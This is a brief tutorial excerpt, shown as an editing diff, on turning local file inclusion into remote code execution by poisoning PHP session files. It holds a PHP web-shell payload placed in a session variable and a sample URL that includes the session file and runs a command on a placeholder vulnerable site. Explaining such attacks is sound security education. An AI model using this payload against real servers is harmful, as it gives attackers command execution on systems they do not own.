Understanding File Inclusion and Path Traversal

 6. PHP Session Files Exploitation

-Attackers manipulate session data to achieve RCE:
+Attackers manipulate session data to achieve remote code execution (RCE):

-- Step 1: Inject PHP code into a session variable
+- Step 1: Inject PHP code into a session variable.

-$_SESSION['username'] = '<?php system($_GET["cmd"]); ?>'; - Step 2: Include the session file
+$_SESSION['username'] = '<?php system($_GET["cmd"]); ?>'; - Step 2: Include the session file.

 http://vulnerable-site.com/include.php?page=/var/lib/php/sessions/sess_abc123&cmd=id